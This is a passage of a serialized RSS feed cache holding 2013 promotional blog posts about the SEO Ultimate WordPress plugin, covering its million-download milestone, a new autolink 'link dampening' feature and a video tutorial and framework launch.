P=ID# setting that WordPress generates by default.</p>\n<p>Later in the week, we’ll discuss how to use the <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-6-6/\">SEO Ultimate Siloed Categories Widget</a> in tandem with the Deeplink Juggernaut Module to quickly implement <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/website-silo-architecture-seo-siloing-simplified/\">website silo architecture</a> quickly and easily on your blog.</p>\n<p>Make sure to check back for more SEO tips and tactics to d<a>istinguish your website in Search Engines </a>from the <a href=\"http://www.seodesignsolutions.com/blog/\">SEO Design Solutions Blog</a>.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=-oVM60xjqBo:c-KbzmXVYjg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/-oVM60xjqBo\" height=\"1\" width=\"1\"/>\";}i:8;a:12:{s:5:\"title\";s:59:\"SEO Ultimate WordPress Plugin Surpasses 1 Million Downloads\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/2PPuJxVFZnE/\";s:8:\"category\";s:84:\"WordPress SEOSEO UltimateSEO Ultimate Passes 1 Million DownloadsWordPress SEO Plugin\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Fri, 18 Jan 2013 00:30:27 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9208\";s:7:\"content\";a:1:{s:7:\"encoded\";s:4281:\"<p>Today our team rejoiced as <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> (the Swiss-army-knife of SEO Plugins) surpassed the <strong>1 Million download benchmark</strong> from WordPress.org.</p>\n<div id=\"attachment_9210\" class=\"wp-caption aligncenter\" style=\"width: 422px\"><a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-wordpress-plugin-surpasses-1-million-downloads/\"><img class=\"size-full wp-image-9210\" title=\"SEO Ultimate Reaches 1 Million Downloads\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/seo-ultimate-surpasses-1-million-downloads.jpg\" alt=\"\" width=\"412\" height=\"291\" /></a><p class=\"wp-caption-text\">SEO Ultimate Reaches 1,000,000 Downloads</p></div>\n<p>As critical milestones go, this represents a crucial turning point for our firm as we move away from the SEO service model into an <em>SEO software business model</em> allowing us to provide access and training to our most coveted WordPress tactics and tools.</p>\n<p>The latest addition to the <a href=\"http://www.seodesignsolutions.com/\">SDS</a> family (scheduled to unveil later this year in mid February) is our <strong>SEO Design Framework for WordPress </strong>dubbed <a href=\"http://www.wpultimatetheme.com/\">WP Ultimate</a>.<span id=\"more-9208\"></span></p>\n<div class=\"mceTemp mceIEcenter\">\n<dl id=\"attachment_9174\" class=\"wp-caption aligncenter\" style=\"width: 310px;\">\n<dt class=\"wp-caption-dt\"><a href=\"http://www.wpultimatetheme.com/wp-ultimate-features/\"><img class=\"size-full wp-image-9174\" title=\"WPU_logo\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/WPU_logo.jpg\" alt=\"\" width=\"300\" height=\"136\" /></a></dt>\n</dl>\n</div>\n<p>If SEO Ultimate is the <em>Swiss army knife</em> of SEO, then <strong><a href=\"http://www.wpultimatetheme.com/\">WP Ultimate</a></strong> is the <strong>“<em>Adobe Photoshop</em>”</strong> of WordPress Framework’s boasting a dynamic range of unparalleled design flexibility<em>(able to accomplish stunning visual design feats</em> via multiple mediums) depending on the strategy or tact required.</p>\n<p><a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\"><img class=\"aligncenter size-full wp-image-9209\" title=\"Download SEO Ultimate from WordPress\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/seo-ultimate761.jpg\" alt=\"\" width=\"513\" height=\"234\" /></a></p>\n<p>The plugin (SEO Ultimate) was originally designed as part of an advanced SEO toolset for our own sites and our clients’ websites &#8211; and over the years we’ve steadily enhanced its scope to replace the functionality of dozens of other SEO plugins from autolinking, optimizing slugs, removing the category base, integrating social sharing, micro formats, rich-snippets, link masking, mass meta editing capabilities, theming / content siloing and more.</p>\n<p>We genuinely hope you’ve enjoyed using SEO Ultimate as much as we’ve enjoyed sharing it and look forward to adding new and exciting features for you to dominate search engines with push-button ease.</p>\n<p>If you haven’t already, feel free to watch the comprehensive <a href=\"http://www.seodesignsolutions.com/wordpress-seo/\">SEO Ultimate Video tutorial</a> to learn more about each feature in detail.</p>\n<p>If are one of the 60% of active users who currently have the two most recent versions of the plugin installed, make sure to either leave a comment, testimonial or <a href=\"http://wordpress.org/support/bb-login.php?re=http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2Fseo-ultimate%2F\">log in to WordPress and vote</a> to share your appreciation.</p>\n<p>Have a comment? Let us know or pass this along to others so they can enjoy the pure on page power of <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a>.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=2PPuJxVFZnE:hKlpAURVNwk:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/2PPuJxVFZnE\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:348:\"Today our team rejoiced as SEO Ultimate (the Swiss-army-knife of SEO Plugins) surpassed the 1 Million download benchmark from WordPress.org. As critical milestones go, this represents a crucial turning point for our firm as we move away from the SEO service model into an SEO software business model allowing us to provide access and training [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"2\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:113:\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-wordpress-plugin-surpasses-1-million-downloads/\";}s:7:\"summary\";s:348:\"Today our team rejoiced as SEO Ultimate (the Swiss-army-knife of SEO Plugins) surpassed the 1 Million download benchmark from WordPress.org. As critical milestones go, this represents a crucial turning point for our firm as we move away from the SEO service model into an SEO software business model allowing us to provide access and training [...]\";s:12:\"atom_content\";s:4281:\"<p>Today our team rejoiced as <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> (the Swiss-army-knife of SEO Plugins) surpassed the <strong>1 Million download benchmark</strong> from WordPress.org.</p>\n<div id=\"attachment_9210\" class=\"wp-caption aligncenter\" style=\"width: 422px\"><a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-wordpress-plugin-surpasses-1-million-downloads/\"><img class=\"size-full wp-image-9210\" title=\"SEO Ultimate Reaches 1 Million Downloads\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/seo-ultimate-surpasses-1-million-downloads.jpg\" alt=\"\" width=\"412\" height=\"291\" /></a><p class=\"wp-caption-text\">SEO Ultimate Reaches 1,000,000 Downloads</p></div>\n<p>As critical milestones go, this represents a crucial turning point for our firm as we move away from the SEO service model into an <em>SEO software business model</em> allowing us to provide access and training to our most coveted WordPress tactics and tools.</p>\n<p>The latest addition to the <a href=\"http://www.seodesignsolutions.com/\">SDS</a> family (scheduled to unveil later this year in mid February) is our <strong>SEO Design Framework for WordPress </strong>dubbed <a href=\"http://www.wpultimatetheme.com/\">WP Ultimate</a>.<span id=\"more-9208\"></span></p>\n<div class=\"mceTemp mceIEcenter\">\n<dl id=\"attachment_9174\" class=\"wp-caption aligncenter\" style=\"width: 310px;\">\n<dt class=\"wp-caption-dt\"><a href=\"http://www.wpultimatetheme.com/wp-ultimate-features/\"><img class=\"size-full wp-image-9174\" title=\"WPU_logo\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/WPU_logo.jpg\" alt=\"\" width=\"300\" height=\"136\" /></a></dt>\n</dl>\n</div>\n<p>If SEO Ultimate is the <em>Swiss army knife</em> of SEO, then <strong><a href=\"http://www.wpultimatetheme.com/\">WP Ultimate</a></strong> is the <strong>“<em>Adobe Photoshop</em>”</strong> of WordPress Framework’s boasting a dynamic range of unparalleled design flexibility<em>(able to accomplish stunning visual design feats</em> via multiple mediums) depending on the strategy or tact required.</p>\n<p><a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\"><img class=\"aligncenter size-full wp-image-9209\" title=\"Download SEO Ultimate from WordPress\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/seo-ultimate761.jpg\" alt=\"\" width=\"513\" height=\"234\" /></a></p>\n<p>The plugin (SEO Ultimate) was originally designed as part of an advanced SEO toolset for our own sites and our clients’ websites &#8211; and over the years we’ve steadily enhanced its scope to replace the functionality of dozens of other SEO plugins from autolinking, optimizing slugs, removing the category base, integrating social sharing, micro formats, rich-snippets, link masking, mass meta editing capabilities, theming / content siloing and more.</p>\n<p>We genuinely hope you’ve enjoyed using SEO Ultimate as much as we’ve enjoyed sharing it and look forward to adding new and exciting features for you to dominate search engines with push-button ease.</p>\n<p>If you haven’t already, feel free to watch the comprehensive <a href=\"http://www.seodesignsolutions.com/wordpress-seo/\">SEO Ultimate Video tutorial</a> to learn more about each feature in detail.</p>\n<p>If are one of the 60% of active users who currently have the two most recent versions of the plugin installed, make sure to either leave a comment, testimonial or <a href=\"http://wordpress.org/support/bb-login.php?re=http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2Fseo-ultimate%2F\">log in to WordPress and vote</a> to share your appreciation.</p>\n<p>Have a comment? Let us know or pass this along to others so they can enjoy the pure on page power of <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a>.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=2PPuJxVFZnE:hKlpAURVNwk:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/2PPuJxVFZnE\" height=\"1\" width=\"1\"/>\";}i:9;a:12:{s:5:\"title\";s:61:\"SEO Ultimate 7.6.1 Introduces Autolink Link Dampening Feature\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/2IWIWQotmU0/\";s:8:\"category\";s:13:\"WordPress SEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Fri, 04 Jan 2013 00:13:12 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9194\";s:7:\"content\";a:1:{s:7:\"encoded\";s:7899:\"<p>SEO Ultimate, (the All-In-One WordPress SEO plugin created by <a href=\"http://www.seodesignsolutions.com/\">SEO Design Solutions</a>) was recently updated to <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/changelog/\">version 7.6.1</a> and introduced an exciting new feature for the Deeplink Juggernaut module that allows you to dampen the amount of <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\">internal links</a> <em>either globally or on a keyword by keyword basis</em>.</p>\n<div id=\"attachment_9195\" class=\"wp-caption aligncenter\" style=\"width: 424px\"><a href=\"http://www.seodesignsolutions.com/blog/\"><img class=\"size-full wp-image-9195\" title=\"SEO Ultimate Introduces Autolink Dampener Feature\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/seo-ultimate-link-dampener.jpg\" alt=\"\" width=\"414\" height=\"290\" /></a><p class=\"wp-caption-text\">SEO Ultimate 7.6.1 Introduces Autolink Dampening Feature</p></div>\n<h3>Why You Should Cap Internal Links!</h3>\n<p>Without going into wild-eyed speculation about Google Penguin and Panda algorithms and / or how other search engines determine what is considered “<em>natural</em>” or “<em>unnatural</em>”, the correlation between excessive link quantities and spam (for either inbound links from other websites or even internal links within websites) is a sensitive, yet serious issue for SEO.</p>\n<p>As SEO&#8217;s, we do know that if you push it too far with either excessive inbound or internal links that your hard earned SERP (search engine result page) position could potentially trigger a penalty and recede (either partially or entirely from the index).<span id=\"more-9194\"></span></p>\n<p>As a result, we previously implemented a <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-6-5/\">site cap feature</a> for Deeplink juggernaut module which allowed you to prescribe a link cap for internal links to prevent potential <a href=\"http://www.seodesignsolutions.com/blog/seo/how-to-avoid-seo-over-optimization/\">over optimization penalties</a>.</p>\n<h3>The History of The Module</h3>\n<p>This feature (previously known as the <strong>per link customization</strong> feature) was originally created to provide webmasters with fine-grained control over their automated internal links within their website.</p>\n<p>As an example, say you had a large site and assigned an autolink / keyword to a specific URL like linking the word <strong>electronics</strong> to your <strong>electronics category landing page</strong>, but you used this phrase egregiously on several thousand instances in your website.</p>\n<p>The last thing you would want is for every instance of that keyword (<a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\">shingle</a>) to link to the target URL and trip a filter for over optimization. Hence, we created two methods to limit this scenario.</p>\n<h3>Reeling in Autolinks</h3>\n<p>The first link governor is located in the <strong>quantity restrictions</strong> region of the <strong>content link settings</strong> tab of the Deeplink Juggernaut Module that allows you to limit the autolink functionality to one instance per page/post (or you can adjust the number of instances per page/post with this option), but what about the rest of the website and those other potential instances of the keyword / autolink?</p>\n<p><img class=\"aligncenter size-full wp-image-9196\" title=\"Link Quantity Restrictions Setting\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/quantity-restrictions.jpg\" alt=\"\" width=\"500\" height=\"236\" /></p>\n<p>Globally, aside from limiting the number of times the keyword was used in the content, what could be done to limit over optimization with autolinking?</p>\n<p>This was why we originally implemented a <strong>link cap</strong> via the <strong>per link customization feature</strong> for SEO Ultimate (on versions 6.5  to version 7.5.7) which allowed you to cap the links (and prevent additional instances of autolinking for each keyword) with a quantity based limit i.e. 15 times, 25 times, etc.</p>\n<p>While this feature worked beautifully on the majority of websites, in some server environments the per link customization site cap feature was rather intensive and created problems due to memory allocation and the inability to turn up the memory within shared hosting environments. So, now the module has evolved and been rewritten using a distinctly different approach we called <em>link dampening</em>.</p>\n<p>The Link Dampening feature allows you dampen the number of total links for internal link quantities for keywords assigned in the content link settings module of SEO Ultimate.</p>\n<h3>How it Works</h3>\n<p>If the anchor text you specify occurs many times throughout your site’s content, you may wish to reduce the overall frequency with which the anchor text is hyperlinked. You can reduce the autolinking frequency by a percentage with the Dampener field. For example:</p>\n<ul>\n<li>0% dampening will have no effect.</li>\n<li>50% dampening means the anchor text will be autolinked approximately half as often as it otherwise would be.</li>\n<li>90% dampening means the anchor text will be autolinked only 10% as often as it otherwise would be.</li>\n<li>100% dampening means the anchor text won’t be linked at all.</li>\n</ul>\n<p>The <strong>“Dampener” </strong>column will only appear if you’ve enabled it under the <strong>“Content Link Settings”</strong> tab.</p>\n<p>To set the feature globally, navigate to the Deeplink Juggernaut content links setting tab and click the option [x] globally decrease autolinking frequency by <span style=\"text-decoration: underline;\">x%</span>, then, add your percentage for global link dampening (using the appropirate ratio above).</p>\n<p><img class=\"aligncenter size-full wp-image-9197\" title=\"Global Link Dampening Setting\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/global-dampening.jpg\" alt=\"\" width=\"500\" height=\"235\" /></p>\n<p>Alternatively, you can use the next checkbox down [x] Add a dampener column to the content links editor (which allows you to dampen links on a per link quantity basis).</p>\n<p><img class=\"aligncenter size-full wp-image-9198\" title=\"Per Link Dampener Setting\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/per-link-dampen.jpg\" alt=\"\" width=\"500\" height=\"38\" /></p>\n<p style=\"text-align: center;\">After activation of this setting, you can dampen link percentages on a keyword / per link basis.</p>\n<p><img class=\"aligncenter size-full wp-image-9205\" title=\"Content Editor Dampener Percentage\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/Dampener-percentage.jpg\" alt=\"\" width=\"500\" height=\"233\" /></p>\n<p>We hope you enjoy and implement this useful SEO feature. This is merely one tactic you can employ using SEO Ultimate for automated internal linking to create optimal on page SEO. Come back soon as we release more informative SEO Ultimate tips and share techniques like how to silo your WordPress blog using the SEO Ultimate Siloed Categories Widget.</p>\n<p>If you haven’t already, watch the <a href=\"http://www.wpultimatetheme.com/seo-ultimate-video-tutorial/\">SEO Ultimate Video Tutorial</a> to learn how to use each module and unleash the pure on page power of this plugin.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=2IWIWQotmU0:4f7r2csqYtA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/2IWIWQotmU0\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:349:\"SEO Ultimate, (the All-In-One WordPress SEO plugin created by SEO Design Solutions) was recently updated to version 7.6.1 and introduced an exciting new feature for the Deeplink Juggernaut module that allows you to dampen the amount of internal links either globally or on a keyword by keyword basis. Why You Should Cap Internal Links! Without [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"1\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:115:\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-7-6-1-introduces-autolink-link-dampening-feature/\";}s:7:\"summary\";s:349:\"SEO Ultimate, (the All-In-One WordPress SEO plugin created by SEO Design Solutions) was recently updated to version 7.6.1 and introduced an exciting new feature for the Deeplink Juggernaut module that allows you to dampen the amount of internal links either globally or on a keyword by keyword basis. Why You Should Cap Internal Links! Without [...]\";s:12:\"atom_content\";s:7899:\"<p>SEO Ultimate, (the All-In-One WordPress SEO plugin created by <a href=\"http://www.seodesignsolutions.com/\">SEO Design Solutions</a>) was recently updated to <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/changelog/\">version 7.6.1</a> and introduced an exciting new feature for the Deeplink Juggernaut module that allows you to dampen the amount of <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\">internal links</a> <em>either globally or on a keyword by keyword basis</em>.</p>\n<div id=\"attachment_9195\" class=\"wp-caption aligncenter\" style=\"width: 424px\"><a href=\"http://www.seodesignsolutions.com/blog/\"><img class=\"size-full wp-image-9195\" title=\"SEO Ultimate Introduces Autolink Dampener Feature\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/seo-ultimate-link-dampener.jpg\" alt=\"\" width=\"414\" height=\"290\" /></a><p class=\"wp-caption-text\">SEO Ultimate 7.6.1 Introduces Autolink Dampening Feature</p></div>\n<h3>Why You Should Cap Internal Links!</h3>\n<p>Without going into wild-eyed speculation about Google Penguin and Panda algorithms and / or how other search engines determine what is considered “<em>natural</em>” or “<em>unnatural</em>”, the correlation between excessive link quantities and spam (for either inbound links from other websites or even internal links within websites) is a sensitive, yet serious issue for SEO.</p>\n<p>As SEO&#8217;s, we do know that if you push it too far with either excessive inbound or internal links that your hard earned SERP (search engine result page) position could potentially trigger a penalty and recede (either partially or entirely from the index).<span id=\"more-9194\"></span></p>\n<p>As a result, we previously implemented a <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/seo-ultimate-6-5/\">site cap feature</a> for Deeplink juggernaut module which allowed you to prescribe a link cap for internal links to prevent potential <a href=\"http://www.seodesignsolutions.com/blog/seo/how-to-avoid-seo-over-optimization/\">over optimization penalties</a>.</p>\n<h3>The History of The Module</h3>\n<p>This feature (previously known as the <strong>per link customization</strong> feature) was originally created to provide webmasters with fine-grained control over their automated internal links within their website.</p>\n<p>As an example, say you had a large site and assigned an autolink / keyword to a specific URL like linking the word <strong>electronics</strong> to your <strong>electronics category landing page</strong>, but you used this phrase egregiously on several thousand instances in your website.</p>\n<p>The last thing you would want is for every instance of that keyword (<a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-information-retrieval/\">shingle</a>) to link to the target URL and trip a filter for over optimization. Hence, we created two methods to limit this scenario.</p>\n<h3>Reeling in Autolinks</h3>\n<p>The first link governor is located in the <strong>quantity restrictions</strong> region of the <strong>content link settings</strong> tab of the Deeplink Juggernaut Module that allows you to limit the autolink functionality to one instance per page/post (or you can adjust the number of instances per page/post with this option), but what about the rest of the website and those other potential instances of the keyword / autolink?</p>\n<p><img class=\"aligncenter size-full wp-image-9196\" title=\"Link Quantity Restrictions Setting\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/quantity-restrictions.jpg\" alt=\"\" width=\"500\" height=\"236\" /></p>\n<p>Globally, aside from limiting the number of times the keyword was used in the content, what could be done to limit over optimization with autolinking?</p>\n<p>This was why we originally implemented a <strong>link cap</strong> via the <strong>per link customization feature</strong> for SEO Ultimate (on versions 6.5  to version 7.5.7) which allowed you to cap the links (and prevent additional instances of autolinking for each keyword) with a quantity based limit i.e. 15 times, 25 times, etc.</p>\n<p>While this feature worked beautifully on the majority of websites, in some server environments the per link customization site cap feature was rather intensive and created problems due to memory allocation and the inability to turn up the memory within shared hosting environments. So, now the module has evolved and been rewritten using a distinctly different approach we called <em>link dampening</em>.</p>\n<p>The Link Dampening feature allows you dampen the number of total links for internal link quantities for keywords assigned in the content link settings module of SEO Ultimate.</p>\n<h3>How it Works</h3>\n<p>If the anchor text you specify occurs many times throughout your site’s content, you may wish to reduce the overall frequency with which the anchor text is hyperlinked. You can reduce the autolinking frequency by a percentage with the Dampener field. For example:</p>\n<ul>\n<li>0% dampening will have no effect.</li>\n<li>50% dampening means the anchor text will be autolinked approximately half as often as it otherwise would be.</li>\n<li>90% dampening means the anchor text will be autolinked only 10% as often as it otherwise would be.</li>\n<li>100% dampening means the anchor text won’t be linked at all.</li>\n</ul>\n<p>The <strong>“Dampener” </strong>column will only appear if you’ve enabled it under the <strong>“Content Link Settings”</strong> tab.</p>\n<p>To set the feature globally, navigate to the Deeplink Juggernaut content links setting tab and click the option [x] globally decrease autolinking frequency by <span style=\"text-decoration: underline;\">x%</span>, then, add your percentage for global link dampening (using the appropirate ratio above).</p>\n<p><img class=\"aligncenter size-full wp-image-9197\" title=\"Global Link Dampening Setting\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/global-dampening.jpg\" alt=\"\" width=\"500\" height=\"235\" /></p>\n<p>Alternatively, you can use the next checkbox down [x] Add a dampener column to the content links editor (which allows you to dampen links on a per link quantity basis).</p>\n<p><img class=\"aligncenter size-full wp-image-9198\" title=\"Per Link Dampener Setting\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/per-link-dampen.jpg\" alt=\"\" width=\"500\" height=\"38\" /></p>\n<p style=\"text-align: center;\">After activation of this setting, you can dampen link percentages on a keyword / per link basis.</p>\n<p><img class=\"aligncenter size-full wp-image-9205\" title=\"Content Editor Dampener Percentage\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/Dampener-percentage.jpg\" alt=\"\" width=\"500\" height=\"233\" /></p>\n<p>We hope you enjoy and implement this useful SEO feature. This is merely one tactic you can employ using SEO Ultimate for automated internal linking to create optimal on page SEO. Come back soon as we release more informative SEO Ultimate tips and share techniques like how to silo your WordPress blog using the SEO Ultimate Siloed Categories Widget.</p>\n<p>If you haven’t already, watch the <a href=\"http://www.wpultimatetheme.com/seo-ultimate-video-tutorial/\">SEO Ultimate Video Tutorial</a> to learn how to use each module and unleash the pure on page power of this plugin.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=2IWIWQotmU0:4f7r2csqYtA:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/2IWIWQotmU0\" height=\"1\" width=\"1\"/>\";}i:10;a:12:{s:5:\"title\";s:51:\"The Official SEO Ultimate WordPress Plugin Tutorial\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/9GlCsPvzX18/\";s:8:\"category\";s:13:\"WordPress SEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 02 Jan 2013 03:43:03 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9173\";s:7:\"content\";a:1:{s:7:\"encoded\";s:7927:\"<p>It’s that time again to kick off the new year and what better way to do so than (1) a new update to <strong>- &#8220;The Real All-In-One SEO Plugin for WordPress&#8221;</strong> &#8211; <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> and (2) to  introduce (our long-awaited) comprehensive video tutorial covering each SEO Module in detail for our plugin.</p>\n<div id=\"attachment_9172\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><a href=\"http://www.wpultimatetheme.com/seo-ultimate-video-tutorial/\"><img class=\"size-full wp-image-9172\" title=\"SEO_Ultimate_Logo\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/SEO_Ultimate_Logo.jpg\" alt=\"\" width=\"500\" height=\"233\" /></a><p class=\"wp-caption-text\">Click to Watch the Long-Awaited SEO Ultimate Video Tutorial (Opt-In Required)</p></div>\n<p>For the record, SEO Ultimate <strong>was NOT designed for the public</strong>; it was originally designed as an in-house SEO tool deployed specifically to provide unparalleled on page SEO setup for WordPress. By consolidating these features into modules (that we could simply toggle on or off and configure at will) allowed us to virtually dominate hundreds of markets for our clients (without having to painstakingly customize the code time and time again).<span id=\"more-9173\"></span></p>\n<h3>Why All the Secrecy with SEO Ultimate?</h3>\n<p>Many wondered &#8211; if SEO Ultimate is so awesome, then why not show us how to use this thing? Well, frankly,  if you weren&#8217;t a client, then we didn&#8217;t want to create unnecessary competition in our markets, especially from giving away our most cherished methods free of charge.</p>\n<p>We hope this explains the lack of documentation over the years <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/\">aside from version updates</a> where we briefly informed users about new features, but in all honesty, we kept <strong>the real power of SEO Ultimate</strong> close to the chest &#8211; until now. The time has come to provide detailed documentation of each module, why it&#8217;s important and of course, how to use it &#8211; courtesy of our lead developer <a href=\"http://profiles.wordpress.org/JohnLamansky/\">John Lamansky</a>.</p>\n<p>Unlike some half-baked SEO plugins, we poured over 15 years of real world advanced SEO principles into this plugin. Prior to releasing this tutorial, the argument of just how powerful SEO Ultimate vs. any other SEO plugin <strong><em>may</em></strong> have been in question. However, after watching the video, this should clear up any confusion about <em>the depth</em> or <em>the real purpose</em> behind each module and the scope of the plugin.</p>\n<p>SEO Ultimate has amazing features such as:</p>\n<ul>\n<li>Twitter Cards</li>\n<li>Opengraph Integration</li>\n<li>Rich Snippets (For Local Pages, Reviews and More)</li>\n<li>Automated Internal Linking (with New Link Dampening Feature)</li>\n<li>Affiliate Link Masking</li>\n<li>A Mass/Bulk Editor for Complete Editing for Meta Tags, Titles, Keywords, Categories, Media Attachments, Post Format Archives and much, much more.</li>\n</ul>\n<h3>The WP Ultimate Framework</h3>\n<p>While the deliberate suppression of information regarding the inner workings of the SEO Ultimate features was not entirely deliberate,  there was a concurrent<strong> master plan</strong> in the works. Just think of it like a 6  year chess game where each  move unfolds another strategic layer of the battle plan, only to culminate in a brilliant (market-dominating) end-game and check mate. It&#8217;s like that, but in this case its all about the <a href=\"http://www.wpultimatetheme.com/\">WP Ultimate Framework</a>.</p>\n<div id=\"attachment_9174\" class=\"wp-caption aligncenter\" style=\"width: 310px\"><a href=\"http://www.wpultimatetheme.com/\"><img class=\"size-full wp-image-9174\" title=\"WPU_logo\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2013/01/WPU_logo.jpg\" alt=\"\" width=\"300\" height=\"136\" /></a><p class=\"wp-caption-text\">The WP Ultimate Framework for WordPress</p></div>\n<p>The market dominating check mate in this scenario was that our proprietary SEO platform  (<a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a>) was absorbed and integrated into our WordPress Framework to  provide unparalled SEO &amp; Design flexibility. The beauty for end-users is, once you gain access to the framework, you also get access to the training as well.</p>\n<h3>Is WP Ultimate Ready Yet?</h3>\n<p>Thank you for your patience, as many of you know for the past two years we&#8217;ve toiled away in the labs like obsessive compulsive perfectionists testing the WPU Framework and we&#8217;re nearly finished coding and stress-testing now. When complete, we will release 1000 copies to a select group, then take that feedback and roll even more powerful features into the Framework.</p>\n<p>Consider it a work in progress, however, recent additions to the framework include adding Twitter Bootstrap,  Google Fonts, a Lightbox Feature which can be toggled via a timer or  link), a more comprehensive Style Editor, a New Media Manager suite to insert ads, media, shortcodes and  more and a Completely Reworked Grid System to handle responsive layouts,  fluid layouts or the ability to create fixed width layouts to liberate  your design impulse and display options and build websites that rank as great as they 